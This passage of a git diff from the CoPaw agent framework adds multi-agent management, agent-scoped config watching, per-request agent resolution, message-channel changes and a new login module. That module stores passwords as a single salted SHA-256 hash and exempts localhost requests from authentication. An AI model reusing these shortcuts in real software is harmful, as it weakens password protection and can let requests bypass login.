ch_mgr is not None: + # Stop multi-agent manager (stops all agents and their components) + multi_agent_mgr = getattr(app.state, "multi_agent_manager", None) + if multi_agent_mgr is not None: + logger.info("Stopping MultiAgentManager...") try: - await ch_mgr.stop_all() - except Exception: - pass - if mcp_mgr is not None: - try: - await mcp_mgr.close_all() - except Exception: - pass - await runner.stop() + await multi_agent_mgr.stop_all() + except Exception as e: + logger.error(f"Error stopping MultiAgentManager: {e}") + + logger.info("Application shutdown complete") app = FastAPI( @@ -453,6 +222,11 @@ async def _do_restart_services( openapi_url="/openapi.json" if DOCS_ENABLED else None, ) +# Add agent context middleware for agent-scoped routes 
+app.add_middleware(AgentContextMiddleware) + +app.add_middleware(AuthMiddleware) + # Apply CORS middleware if CORS_ORIGINS is set if CORS_ORIGINS: origins = [o.strip() for o in CORS_ORIGINS.split(",") if o.strip()] @@ -504,7 +278,8 @@ def read_root(): "CoPaw Web Console is not available. " "If you installed CoPaw from source code, please run " "`npm ci && npm run build` in CoPaw's `console/` " - "directory, and restart CoPaw to enable the web console." + "directory, and restart CoPaw to enable the " + "web console." ), } @@ -517,6 +292,11 @@ def get_version(): app.include_router(api_router, prefix="/api") +# Agent-scoped router: /api/agents/{agentId}/chats, etc. +agent_scoped_router = create_agent_scoped_router() +app.include_router(agent_scoped_router, prefix="/api") + + app.include_router( agent_app.router, prefix="/api/agent", @@ -532,6 +312,12 @@ def get_version(): if os.path.isdir(_CONSOLE_STATIC_DIR): _console_path = Path(_CONSOLE_STATIC_DIR) + def _serve_console_index(): + if _CONSOLE_INDEX and _CONSOLE_INDEX.exists(): + return FileResponse(_CONSOLE_INDEX) + + raise HTTPException(status_code=404, detail="Not Found") + @app.get("/logo.png") def _console_logo(): f = _console_path / "logo.png" @@ -556,9 +342,14 @@ def _console_icon(): name="assets", ) + @app.get("/console") + @app.get("/console/") + @app.get("/console/{full_path:path}") + def _console_spa_alias(full_path: str = ""): + _ = full_path + return _serve_console_index() + @app.get("/{full_path:path}") def _console_spa(full_path: str): - if _CONSOLE_INDEX and _CONSOLE_INDEX.exists(): - return FileResponse(_CONSOLE_INDEX) - - raise HTTPException(status_code=404, detail="Not Found") + _ = full_path + return _serve_console_index() diff --git a/src/copaw/config/watcher.py b/src/copaw/app/agent_config_watcher.py similarity index 54% rename from src/copaw/config/watcher.py rename to src/copaw/app/agent_config_watcher.py index 8c5dded31..8ccb87463 100644 --- a/src/copaw/config/watcher.py +++ 
b/src/copaw/app/agent_config_watcher.py @@ -1,16 +1,23 @@ # -*- coding: utf-8 -*- -"""Watch config.json for changes and auto-reload channels and heartbeat.""" +"""Watch agent.json for changes and auto-reload agent components. + +This watcher monitors an agent's workspace/agent.json file for changes +and automatically reloads channels, heartbeat, and other configurations +without requiring manual restart. +""" from __future__ import annotations import asyncio import logging from pathlib import Path -from typing import Any, Optional +from typing import Any, Optional, TYPE_CHECKING + +from ..config.config import load_agent_config +from ..config.utils import get_available_channels -from .utils import load_config, get_config_path, get_available_channels -from .config import ChannelConfig, HeartbeatConfig -from ..app.channels import ChannelManager # pylint: disable=no-name-in-module +if TYPE_CHECKING: + from ..config.config import ChannelConfig, HeartbeatConfig logger = logging.getLogger(__name__) @@ -25,27 +32,43 @@ def _heartbeat_hash(hb: Optional[HeartbeatConfig]) -> int: return hash(str(hb.model_dump(mode="json"))) -class ConfigWatcher: - """Poll config.json mtime; reload only changed channels automatically.""" +class AgentConfigWatcher: + """Poll agent.json mtime and reload changed configs automatically. + + This watcher is agent-scoped and monitors a specific agent's + workspace/agent.json file for configuration changes. + """ def __init__( self, - channel_manager: ChannelManager, - poll_interval: float = DEFAULT_POLL_INTERVAL, - config_path: Optional[Path] = None, + agent_id: str, + workspace_dir: Path, + channel_manager: Any, cron_manager: Any = None, + poll_interval: float = DEFAULT_POLL_INTERVAL, ): + """Initialize agent config watcher. 
+ + Args: + agent_id: Agent ID to monitor + workspace_dir: Path to agent's workspace directory + channel_manager: ChannelManager instance for this agent + cron_manager: CronManager instance for this agent (optional) + poll_interval: How often to check for changes (seconds) + """ + self._agent_id = agent_id + self._workspace_dir = workspace_dir + self._config_path = workspace_dir / "agent.json" self._channel_manager = channel_manager - self._poll_interval = poll_interval - self._config_path = config_path or get_config_path() self._cron_manager = cron_manager + self._poll_interval = poll_interval self._task: Optional[asyncio.Task] = None - # Snapshot of the last known channel config (for diffing) + # Snapshot of the last known config (for diffing) self._last_channels: Optional[ChannelConfig] = None self._last_channels_hash: Optional[int] = None self._last_heartbeat_hash: Optional[int] = None - # mtime of config.json at last check + # mtime of agent.json at last check self._last_mtime: float = 0.0 async def start(self) -> None: @@ -53,15 +76,15 @@ async def start(self) -> None: self._snapshot() self._task = asyncio.create_task( self._poll_loop(), - name="config_watcher", + name=f"agent_config_watcher_{self._agent_id}", ) logger.info( - "ConfigWatcher started (poll=%.1fs, path=%s)", - self._poll_interval, - self._config_path, + f"AgentConfigWatcher started for agent {self._agent_id} " + f"(poll={self._poll_interval}s, path={self._config_path})", ) async def stop(self) -> None: + """Stop the polling task.""" if self._task: self._task.cancel() try: @@ -69,28 +92,40 @@ async def stop(self) -> None: except asyncio.CancelledError: pass self._task = None - logger.info("ConfigWatcher stopped") + logger.info(f"AgentConfigWatcher stopped for agent {self._agent_id}") # ------------------------------------------------------------------ + # Internal methods + # ------------------------------------------------------------------ def _snapshot(self) -> None: - """Load current config; 
record mtime, channels hash, heartbeat hash.""" + """Load current agent config; record mtime and hashes.""" try: self._last_mtime = self._config_path.stat().st_mtime except FileNotFoundError: self._last_mtime = 0.0 + try: - config = load_config(self._config_path) - self._last_channels = config.channels.model_copy(deep=True) - self._last_channels_hash = self._channels_hash(config.channels) - hb = getattr( - config.agents.defaults, - "heartbeat", - None, + agent_config = load_agent_config(self._agent_id) + if agent_config.channels: + self._last_channels = agent_config.channels.model_copy( + deep=True, + ) + self._last_channels_hash = self._channels_hash( + agent_config.channels, + ) + else: + self._last_channels = None + self._last_channels_hash = None + + self._last_heartbeat_hash = _heartbeat_hash( + agent_config.heartbeat, ) - self._last_heartbeat_hash = _heartbeat_hash(hb) except Exception: - logger.exception("ConfigWatcher: failed to load initial config") + logger.exception( + f"AgentConfigWatcher: failed to load initial config " + f"for agent {self._agent_id}", + ) self._last_channels = None self._last_channels_hash = None self._last_heartbeat_hash = None @@ -123,26 +158,33 @@ async def _reload_one_channel( old_channel = await self._channel_manager.get_channel(name) if old_channel is None: logger.warning( - "ConfigWatcher: channel '%s' not found, skip", - name, + f"AgentConfigWatcher ({self._agent_id}): " + f"channel '{name}' not found, skip", ) return new_channel = old_channel.clone(new_ch) await self._channel_manager.replace_channel(new_channel) - logger.info("ConfigWatcher: channel '%s' reloaded", name) + logger.info( + f"AgentConfigWatcher ({self._agent_id}): " + f"channel '{name}' reloaded", + ) except Exception: logger.exception( - "ConfigWatcher: failed to reload channel '%s'", - name, + f"AgentConfigWatcher ({self._agent_id}): " + f"failed to reload channel '{name}'", ) setattr(new_channels, name, old_ch if old_ch else new_ch) - async def 
_apply_channel_changes(self, loaded_config: Any) -> None: + async def _apply_channel_changes(self, agent_config: Any) -> None: """Diff channels and reload changed ones; update snapshot.""" - new_hash = self._channels_hash(loaded_config.channels) + if not agent_config.channels: + return + + new_hash = self._channels_hash(agent_config.channels) if new_hash == self._last_channels_hash: return - new_channels = loaded_config.channels + + new_channels = agent_config.channels old_channels = self._last_channels extra_new = getattr(new_channels, "__pydantic_extra__", None) or {} extra_old = ( @@ -150,6 +192,7 @@ async def _apply_channel_changes(self, loaded_config: Any) -> None: if old_channels else {} ) + for name in get_available_channels(): new_ch = getattr(new_channels, name, None) or extra_new.get(name) old_ch = ( @@ -164,17 +207,17 @@ async def _apply_channel_changes(self, loaded_config: Any) -> None: if new_dump is not None and new_dump == old_dump: continue logger.info( - "ConfigWatcher: channel '%s' config changed, reloading", - name, + f"AgentConfigWatcher ({self._agent_id}): " + f"channel '{name}' config changed, reloading", ) await self._reload_one_channel(name, new_ch, new_channels, old_ch) + self._last_channels = new_channels.model_copy(deep=True) self._last_channels_hash = self._channels_hash(new_channels) - async def _apply_heartbeat_change(self, loaded_config: Any) -> None: + async def _apply_heartbeat_change(self, agent_config: Any) -> None: """Update heartbeat hash and reschedule if changed.""" - hb = getattr(loaded_config.agents.defaults, "heartbeat", None) - new_hb_hash = _heartbeat_hash(hb) + new_hb_hash = _heartbeat_hash(agent_config.heartbeat) if ( self._cron_manager is not None and new_hb_hash != self._last_heartbeat_hash @@ -182,34 +225,53 @@ async def _apply_heartbeat_change(self, loaded_config: Any) -> None: self._last_heartbeat_hash = new_hb_hash try: await self._cron_manager.reschedule_heartbeat() - logger.info("ConfigWatcher: heartbeat 
rescheduled") + logger.info( + f"AgentConfigWatcher ({self._agent_id}): " + f"heartbeat rescheduled", + ) except Exception: logger.exception( - "ConfigWatcher: failed to reschedule heartbeat", + f"AgentConfigWatcher ({self._agent_id}): " + f"failed to reschedule heartbeat", ) else: self._last_heartbeat_hash = new_hb_hash async def _poll_loop(self) -> None: + """Main polling loop.""" while True: try: await asyncio.sleep(self._poll_interval) await self._check() except Exception: - logger.exception("ConfigWatcher: poll iteration failed") + logger.exception( + f"AgentConfigWatcher ({self._agent_id}): " + f"poll iteration failed", + ) async def _check(self) -> None: + """Check for config changes and reload if needed.""" try: mtime = self._config_path.stat().st_mtime except FileNotFoundError: return + if mtime == self._last_mtime: return + self._last_mtime = mtime + try: - loaded = load_config(self._config_path) + agent_config = load_agent_config(self._agent_id) except Exception: - logger.exception("ConfigWatcher: failed to parse config.json") + logger.exception( + f"AgentConfigWatcher ({self._agent_id}): " + f"failed to parse agent.json", + ) return - await self._apply_channel_changes(loaded) - await self._apply_heartbeat_change(loaded) + + # Apply changes + if self._channel_manager: + await self._apply_channel_changes(agent_config) + if self._cron_manager: + await self._apply_heartbeat_change(agent_config) diff --git a/src/copaw/app/agent_context.py b/src/copaw/app/agent_context.py new file mode 100644 index 000000000..d263ee5bf --- /dev/null +++ b/src/copaw/app/agent_context.py @@ -0,0 +1,117 @@ +# -*- coding: utf-8 -*- +"""Agent context utilities for multi-agent support. + +Provides utilities to get the correct agent instance for each request. 
+"""
+from contextvars import ContextVar
+from typing import Optional, TYPE_CHECKING
+from fastapi import Request
+from .multi_agent_manager import MultiAgentManager
+from ..config.utils import load_config
+
+if TYPE_CHECKING:
+    from .workspace import Workspace
+
+# Context variable to store current agent ID across async calls
+_current_agent_id: ContextVar[Optional[str]] = ContextVar(
+    "current_agent_id",
+    default=None,
+)
+
+
+async def get_agent_for_request(
+    request: Request,
+    agent_id: Optional[str] = None,
+) -> "Workspace":
+    """Get agent workspace for current request.
+
+    Priority:
+    1. agent_id parameter (explicit override)
+    2. request.state.agent_id (from agent-scoped router)
+    3. X-Agent-Id header (from frontend)
+    4. Active agent from config
+
+    Args:
+        request: FastAPI request object
+        agent_id: Agent ID override (highest priority)
+
+    Returns:
+        Workspace for the specified or active agent
+
+    Raises:
+        HTTPException: If agent not found
+    """
+    from fastapi import HTTPException
+
+    # Determine which agent to use
+    target_agent_id = agent_id
+
+    # Check request.state.agent_id (set by agent-scoped router)
+    if not target_agent_id and hasattr(request.state, "agent_id"):
+        target_agent_id = request.state.agent_id
+
+    # Check X-Agent-Id header
+    if not target_agent_id:
+        target_agent_id = request.headers.get("X-Agent-Id")
+
+    if not target_agent_id:
+        # Fallback to active agent from config
+        config = load_config()
+        target_agent_id = config.agents.active_agent or "default"
+
+    # Get MultiAgentManager
+    if not hasattr(request.app.state, "multi_agent_manager"):
+        raise HTTPException(
+            status_code=500,
+            detail="MultiAgentManager not initialized",
+        )
+
+    manager: MultiAgentManager = request.app.state.multi_agent_manager
+
+    try:
+        workspace = await manager.get_agent(target_agent_id)
+    except Exception as e:
+        raise HTTPException(
+            status_code=500,
+            detail=f"Failed to get agent: {str(e)}",
+        ) from e
+    # Raise the 404 outside the try so the broad except cannot remap it
+    if not workspace:
+        raise HTTPException(
+            status_code=404,
+            detail=f"Agent '{target_agent_id}' not found",
+        )
+    return workspace
+
+
+def get_active_agent_id() -> str:
+    """Get current active agent ID from config.
+
+    Returns:
+        Active agent ID, defaults to "default"
+    """
+    try:
+        config = load_config()
+        return config.agents.active_agent or "default"
+    except Exception:
+        return "default"
+
+
+def set_current_agent_id(agent_id: str) -> None:
+    """Set current agent ID in context.
+
+    Args:
+        agent_id: Agent ID to set
+    """
+    _current_agent_id.set(agent_id)
+
+
+def get_current_agent_id() -> str:
+    """Get current agent ID from context or config fallback.
+
+    Returns:
+        Current agent ID, defaults to active agent or "default"
+    """
+    agent_id = _current_agent_id.get()
+    if agent_id:
+        return agent_id
+    return get_active_agent_id()
diff --git a/src/copaw/app/auth.py b/src/copaw/app/auth.py
new file mode 100644
index 000000000..b2b05bdd2
--- /dev/null
+++ b/src/copaw/app/auth.py
@@ -0,0 +1,335 @@
+# -*- coding: utf-8 -*-
+"""Authentication module: password hashing, HMAC-signed tokens, and FastAPI middleware.
+
+Login is disabled by default and only enabled when the environment
+variable ``COPAW_AUTH_ENABLED`` is set to a truthy value (``true``,
+``1``, ``yes``). Credentials are created through a web-based
+registration flow rather than environment variables, so that agents
+running inside the process cannot read plaintext passwords.
+
+Single-user design: only one account can be registered. If the user
+forgets their password, delete ``auth.json`` from ``SECRET_DIR`` and
+restart the service to re-register.
+
+Uses only Python stdlib (hashlib, hmac, secrets) to avoid adding new
+dependencies. The password is stored as a salted SHA-256 hash in
+``auth.json`` under ``SECRET_DIR``. 
+""" +from __future__ import annotations + +import hashlib +import hmac +import json +import logging +import os +import secrets +import time +from typing import Optional + +from fastapi import Request, Response +from starlette.middleware.base import BaseHTTPMiddleware + +from ..constant import SECRET_DIR + +logger = logging.getLogger(__name__) + +AUTH_FILE = SECRET_DIR / "auth.json" + +# Token validity: 7 days +TOKEN_EXPIRY_SECONDS = 7 * 24 * 3600 + +# Paths that do NOT require authentication +_PUBLIC_PATHS: frozenset[str] = frozenset( + { + "/api/auth/login", + "/api/auth/status", + "/api/auth/register", + "/api/version", + }, +) + +# Prefixes that do NOT require authentication (static assets) +_PUBLIC_PREFIXES: tuple[str, ...] = ( + "/assets/", + "/logo.png", + "/copaw-symbol.svg", +) + + +# --------------------------------------------------------------------------- +# Helpers (reuse SECRET_DIR patterns from envs/store.py) +# --------------------------------------------------------------------------- + + +def _chmod_best_effort(path, mode: int) -> None: + try: + os.chmod(path, mode) + except OSError: + pass + + +def _prepare_secret_parent(path) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + _chmod_best_effort(path.parent, 0o700) + + +# --------------------------------------------------------------------------- +# Password hashing (salted SHA-256, no external deps) +# --------------------------------------------------------------------------- + + +def _hash_password( + password: str, + salt: Optional[str] = None, +) -> tuple[str, str]: + """Hash *password* with *salt*. 
Returns ``(hash_hex, salt_hex)``.""" + if salt is None: + salt = secrets.token_hex(16) + h = hashlib.sha256((salt + password).encode("utf-8")).hexdigest() + return h, salt + + +def verify_password(password: str, stored_hash: str, salt: str) -> bool: + """Verify *password* against a stored hash.""" + h, _ = _hash_password(password, salt) + return hmac.compare_digest(h, stored_hash) + + +# --------------------------------------------------------------------------- +# Token generation / verification (HMAC-SHA256, no PyJWT needed) +# --------------------------------------------------------------------------- + + +def _get_jwt_secret() -> str: + """Return the signing secret, creating one if absent.""" + data = _load_auth_data() + secret = data.get("jwt_secret", "") + if not secret: + secret = secrets.token_hex(32) + data["jwt_secret"] = secret + _save_auth_data(data) + return secret + + +def create_token(username: str) -> str: + """Create an HMAC-signed token: ``base64(payload).signature``.""" + import base64 + + secret = _get_jwt_secret() + payload = json.dumps( + { + "sub": username, + "exp": int(time.time()) + TOKEN_EXPIRY_SECONDS, + "iat": int(time.time()), + }, + ) + payload_b64 = base64.urlsafe_b64encode(payload.encode()).decode() + sig = hmac.new( + secret.encode(), + payload_b64.encode(), + hashlib.sha256, + ).hexdigest() + return f"{payload_b64}.{sig}" + + +def verify_token(token: str) -> Optional[str]: + """Verify *token*, return username if valid, ``None`` otherwise.""" + import base64 + + try: + parts = token.split(".", 1) + if len(parts) != 2: + return None + payload_b64, sig = parts + secret = _get_jwt_secret() + expected_sig = hmac.new( + secret.encode(), + payload_b64.encode(), + hashlib.sha256, + ).hexdigest() + if not hmac.compare_digest(sig, expected_sig): + return None + payload = json.loads(base64.urlsafe_b64decode(payload_b64)) + if payload.get("exp", 0) < time.time(): + return None + return payload.get("sub") + except (json.JSONDecodeError, 
KeyError, ValueError, TypeError) as exc: + logger.debug("Token verification failed: %s", exc) + return None + + +# --------------------------------------------------------------------------- +# Auth data persistence (auth.json in SECRET_DIR) +# --------------------------------------------------------------------------- + + +def _load_auth_data() -> dict: + """Load ``auth.json`` from ``SECRET_DIR``. + + Returns the parsed dict, or a sentinel with ``_auth_load_error`` + set to ``True`` when the file exists but cannot be read/parsed so + that callers can fail closed instead of silently bypassing auth. + """ + if AUTH_FILE.is_file(): + try: + with open(AUTH_FILE, "r", encoding="utf-8") as f: + return json.load(f) + except (json.JSONDecodeError, OSError) as exc: + logger.error("Failed to load auth file %s: %s", AUTH_FILE, exc) + return {"_auth_load_error": True} + return {} + + +def _save_auth_data(data: dict) -> None: + """Save ``auth.json`` to ``SECRET_DIR`` with restrictive permissions.""" + _prepare_secret_parent(AUTH_FILE) + with open(AUTH_FILE, "w", encoding="utf-8") as f: + json.dump(data, f, indent=2, ensure_ascii=False) + _chmod_best_effort(AUTH_FILE, 0o600) + + +def is_auth_enabled() -> bool: + """Check whether authentication is enabled via environment variable. + + Returns ``True`` when ``COPAW_AUTH_ENABLED`` is set to a truthy + value (``true``, ``1``, ``yes``). The presence of a registered + user is checked separately by the middleware so that the first + user can still reach the registration page. 
+    """
+    env_flag = os.environ.get("COPAW_AUTH_ENABLED", "").strip().lower()
+    return env_flag in ("true", "1", "yes")
+
+
+def has_registered_users() -> bool:
+    """True if a user is registered; an unreadable auth.json fails closed."""
+    data = _load_auth_data()
+    return bool(data.get("user") or data.get("_auth_load_error"))
+
+
+# ---------------------------------------------------------------------------
+# Registration (single-user)
+# ---------------------------------------------------------------------------
+
+
+def register_user(username: str, password: str) -> Optional[str]:
+    """Register the single user account.
+
+    Returns a token on success, ``None`` if a user already exists.
+    """
+    data = _load_auth_data()
+
+    # Only one user allowed; fail closed if auth.json was unreadable
+    if data.get("user") or data.get("_auth_load_error"):
+        return None
+
+    pw_hash, salt = _hash_password(password)
+    data["user"] = {
+        "username": username,
+        "password_hash": pw_hash,
+        "password_salt": salt,
+    }
+
+    # Ensure jwt_secret exists
+    if not data.get("jwt_secret"):
+        data["jwt_secret"] = secrets.token_hex(32)
+
+    _save_auth_data(data)
+    logger.info("User '%s' registered", username)
+    return create_token(username)
+
+
+# ---------------------------------------------------------------------------
+# Authentication
+# ---------------------------------------------------------------------------
+
+
+def authenticate(username: str, password: str) -> Optional[str]:
+    """Authenticate *username* / *password*. 
Returns a token if valid.""" + data = _load_auth_data() + user = data.get("user") + if not user: + return None + if user.get("username") != username: + return None + stored_hash = user.get("password_hash", "") + stored_salt = user.get("password_salt", "") + if ( + stored_hash + and stored_salt + and verify_password(password, stored_hash, stored_salt) + ): + return create_token(username) + return None + + +# --------------------------------------------------------------------------- +# FastAPI middleware +# --------------------------------------------------------------------------- + + +class AuthMiddleware(BaseHTTPMiddleware): + """Middleware that checks Bearer token on protected routes.""" + + async def dispatch( + self, + request: Request, + call_next, + ) -> Response: + """Check Bearer token on protected API routes; skip public paths.""" + if self._should_skip_auth(request): + return await call_next(request) + + token = self._extract_token(request) + if not token: + return Response( + content=json.dumps({"detail": "Not authenticated"}), + status_code=401, + media_type="application/json", + ) + + user = verify_token(token) + if user is None: + return Response( + content=json.dumps( + {"detail": "Invalid or expired token"}, + ), + status_code=401, + media_type="application/json", + ) + + request.state.user = user + return await call_next(request) + + @staticmethod + def _should_skip_auth(request: Request) -> bool: + """Return ``True`` when the request does not require auth.""" + if not is_auth_enabled() or not has_registered_users(): + return True + + path = request.url.path + + if request.method == "OPTIONS": + return True + + if path in _PUBLIC_PATHS or any( + path.startswith(p) for p in _PUBLIC_PREFIXES + ): + return True + + # Only protect /api/ routes + if not path.startswith("/api/"): + return True + + # Allow localhost requests without auth (CLI runs locally) + client_host = request.client.host if request.client else "" + return client_host in ("127.0.0.1", 
"::1") + + @staticmethod + def _extract_token(request: Request) -> Optional[str]: + """Extract Bearer token from header or WebSocket query param.""" + auth_header = request.headers.get("Authorization", "") + if auth_header.startswith("Bearer "): + return auth_header[7:] + if "upgrade" in request.headers.get("connection", "").lower(): + return request.query_params.get("token") + return None diff --git a/src/copaw/app/channels/base.py b/src/copaw/app/channels/base.py index c4e466bc4..993fa9906 100644 --- a/src/copaw/app/channels/base.py +++ b/src/copaw/app/channels/base.py @@ -34,6 +34,7 @@ from .renderer import MessageRenderer, RenderStyle from .schema import ChannelType +from ...config.utils import load_config # Optional callback to enqueue payload (set by manager) EnqueueCallback = Optional[Callable[[Any], None]] @@ -99,10 +100,17 @@ def __init__( self.deny_message = deny_message or "" self.require_mention = require_mention self._enqueue: EnqueueCallback = None + cfg = load_config() + internal_tools = frozenset( + name + for name, tc in cfg.tools.builtin_tools.items() + if not tc.display_to_user + ) self._render_style = RenderStyle( show_tool_details=show_tool_details, filter_tool_messages=filter_tool_messages, filter_thinking=filter_thinking, + internal_tools=internal_tools, ) self._renderer = MessageRenderer(self._render_style) self._http: Optional[Any] = None @@ -122,15 +130,15 @@ def _is_native_payload(self, payload: Any) -> bool: def get_debounce_key(self, payload: Any) -> str: """ Key for time debounce (same key = same conversation). - Override for channel-specific keys (e.g. short conversation_id). + Delegates to ``resolve_session_id`` so every channel gets + session-scoped isolation automatically. 
""" if isinstance(payload, dict): + sender_id = payload.get("sender_id") or "" meta = payload.get("meta") or {} - return ( - payload.get("session_id") - or meta.get("conversation_id") - or payload.get("sender_id") - or "" + return payload.get("session_id") or self.resolve_session_id( + sender_id, + meta, ) return getattr(payload, "session_id", "") or "" @@ -154,6 +162,7 @@ def merge_native_items(self, items: List[Any]) -> Any: "reply_loop", "incoming_message", "conversation_id", + "message_id", ): if k in m: merged_meta[k] = m[k] @@ -228,6 +237,13 @@ def _content_has_text(self, contents: List[Any]) -> bool: return True return False + def _content_has_audio(self, contents: List[Any]) -> bool: + """True if contents has at least one AUDIO block.""" + return any( + getattr(c, "type", None) == ContentType.AUDIO + for c in (contents or []) + ) + def _apply_no_text_debounce( self, session_id: str, @@ -236,8 +252,19 @@ def _apply_no_text_debounce( """ Debounce: if content has no text, buffer and return (False, []). If has text, return (True, merged) with any buffered content prepended. + Audio-only messages bypass debounce and are processed immediately + (voice messages are standalone user input, not partial uploads). """ if not self._content_has_text(content_parts): + if self._content_has_audio(content_parts): + # Audio-only messages (e.g. voice messages) should be + # processed immediately — they are complete user input. 
+ pending = self._pending_content_by_session.pop( + session_id, + [], + ) + merged = pending + list(content_parts) + return (True, merged) self._pending_content_by_session.setdefault( session_id, [], @@ -344,7 +371,7 @@ def build_agent_request_from_user_content( if not content_parts: content_parts = [ - TextContent(type=ContentType.TEXT, text=""), + TextContent(type=ContentType.TEXT, text=" "), ] msg = Message( type=MessageType.MESSAGE, diff --git a/src/copaw/app/channels/console/channel.py b/src/copaw/app/channels/console/channel.py index 26d480c42..4498c1fef 100644 --- a/src/copaw/app/channels/console/channel.py +++ b/src/copaw/app/channels/console/channel.py @@ -5,17 +5,18 @@ A lightweight channel that prints all agent responses to stdout. Messages are sent to the agent via the standard AgentApp ``/agent/process`` -endpoint. This channel only handles the **output** side: whenever a -completed message event or a proactive send arrives, it is pretty-printed -to the terminal. +endpoint or via POST /console/chat. This channel handles the **output** side: +whenever a completed message event or a proactive send arrives, it is +pretty-printed to the terminal. """ from __future__ import annotations import logging import os import sys +import json from datetime import datetime -from typing import Any, Dict, List, Optional +from typing import Any, AsyncGenerator, Dict, List, Optional from agentscope_runtime.engine.schemas.agent_schemas import RunStatus @@ -139,6 +140,19 @@ def from_config( filter_thinking=filter_thinking, ) + def resolve_session_id( + self, + sender_id: str, + channel_meta: Optional[dict] = None, + ) -> str: + """Resolve session_id: use explicit meta['session_id'] when provided + (e.g. from the HTTP /console/chat API), otherwise fall back to + 'console:'. 
+ """ + if channel_meta and channel_meta.get("session_id"): + return channel_meta["session_id"] + return f"{self.channel}:{sender_id}" + def build_agent_request_from_native(self, native_payload: Any) -> Any: """ Build AgentRequest from console native payload (dict with @@ -161,8 +175,8 @@ def build_agent_request_from_native(self, native_payload: Any) -> Any: request.channel_meta = meta return request - async def consume_one(self, payload: Any) -> None: - """Process one payload (AgentRequest or native dict) from queue.""" + async def stream_one(self, payload: Any) -> AsyncGenerator[str, None]: + """Process one payload and yield SSE-formatted events""" if isinstance(payload, dict) and "content_parts" in payload: session_id = self.resolve_session_id( payload.get("sender_id") or "", @@ -212,6 +226,14 @@ async def consume_one(self, payload: Any) -> None: ev_type, ) + if hasattr(event, "model_dump_json"): + data = event.model_dump_json() + elif hasattr(event, "json"): + data = event.json() + else: + data = json.dumps({"text": str(event)}) + yield f"data: {data}\n\n" + if obj == "message" and status == RunStatus.Completed: parts = self._message_to_content_parts(event) self._print_parts(parts, ev_type) @@ -242,6 +264,11 @@ async def consume_one(self, payload: Any) -> None: err_msg = str(e).strip() or "An error occurred while processing." 
self._print_error(err_msg) + async def consume_one(self, payload: Any) -> None: + """Process one payload; drain stream_one (queue/terminal).""" + async for _ in self.stream_one(payload): + pass + # ── pretty-print helpers ──────────────────────────────────────── def _print_parts( diff --git a/src/copaw/app/channels/dingtalk/ai_card.py b/src/copaw/app/channels/dingtalk/ai_card.py new file mode 100644 index 000000000..a7f38991a --- /dev/null +++ b/src/copaw/app/channels/dingtalk/ai_card.py @@ -0,0 +1,104 @@ +# -*- coding: utf-8 -*- +"""DingTalk AI Card helpers.""" + +from __future__ import annotations + +import json +import re +import time +from dataclasses import asdict, dataclass +from pathlib import Path +from typing import Dict, List + +PROCESSING = "1" +INPUTING = "2" +FINISHED = "3" +FAILED = "5" +_TERMINAL_STATES = {FINISHED, FAILED} + + +@dataclass +class ActiveAICard: + card_instance_id: str + access_token: str + conversation_id: str + account_id: str + store_path: str + created_at: int + last_updated: int + state: str + last_streamed_content: str = "" + + +class AICardPendingStore: + """Persist active inbound cards for crash recovery.""" + + def __init__(self, path: Path): + self._path = path + + @property + def path(self) -> Path: + return self._path + + def load(self) -> List[dict]: + if not self._path.is_file(): + return [] + try: + data = json.loads(self._path.read_text(encoding="utf-8")) + pending = ( + data.get("pending_cards") if isinstance(data, dict) else [] + ) + return pending if isinstance(pending, list) else [] + except Exception: + return [] + + def save(self, cards: Dict[str, ActiveAICard]) -> None: + self._path.parent.mkdir(parents=True, exist_ok=True) + pending_cards = [ + { + "account_id": v.account_id, + "card_instance_id": v.card_instance_id, + "conversation_id": v.conversation_id, + "created_at": v.created_at, + "last_updated": v.last_updated, + "state": v.state, + } + for v in cards.values() + if v.state not in _TERMINAL_STATES + ] + 
data = { + "version": 1, + "updated_at": int(time.time() * 1000), + "pending_cards": pending_cards, + } + tmp = self._path.with_suffix(".tmp") + tmp.write_text( + json.dumps(data, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + tmp.replace(self._path) + + +def is_group_conversation(conversation_id: str) -> bool: + return (conversation_id or "").startswith("cid") + + +def thinking_or_tool_to_card_text(text: str, title: str) -> str: + body = (text or "")[:500] + if len(text or "") > 500: + body += "…" + lines = body.splitlines() or [""] + fixed = [] + for ln in lines: + ln = re.sub(r"^_$", "*", ln) + ln = re.sub(r"_$", "*", ln) + fixed.append(f"> {ln}") + return f"{title}\n" + "\n".join(fixed) + + +def to_pending_record(card: ActiveAICard) -> dict: + data = asdict(card) + data.pop("access_token", None) + data.pop("store_path", None) + data.pop("last_streamed_content", None) + return data diff --git a/src/copaw/app/channels/dingtalk/channel.py b/src/copaw/app/channels/dingtalk/channel.py index 8491df400..7c913e200 100644 --- a/src/copaw/app/channels/dingtalk/channel.py +++ b/src/copaw/app/channels/dingtalk/channel.py @@ -22,8 +22,10 @@ import mimetypes import os import threading +import types from pathlib import Path from typing import TYPE_CHECKING, Any, Dict, List, Optional +from uuid import uuid4 from urllib.parse import urlparse import aiohttp @@ -34,6 +36,7 @@ from ..utils import file_url_to_local_path from ....config.config import DingTalkConfig as DingTalkChannelConfig from ....config.utils import get_config_path +from ....constant import DEFAULT_MEDIA_DIR from ..base import ( BaseChannel, @@ -44,7 +47,12 @@ ) from .constants import ( + AI_CARD_PROCESSING_TEXT, + AI_CARD_RECOVERY_FINAL_TEXT, + AI_CARD_STREAM_MIN_INTERVAL_SECONDS, + AI_CARD_TOKEN_PREEMPTIVE_REFRESH_SECONDS, DINGTALK_TOKEN_TTL_SECONDS, + SENT_VIA_AI_CARD, SENT_VIA_WEBHOOK, ) from .content_utils import ( @@ -54,6 +62,14 @@ ) from .handler import DingTalkChannelHandler from . 
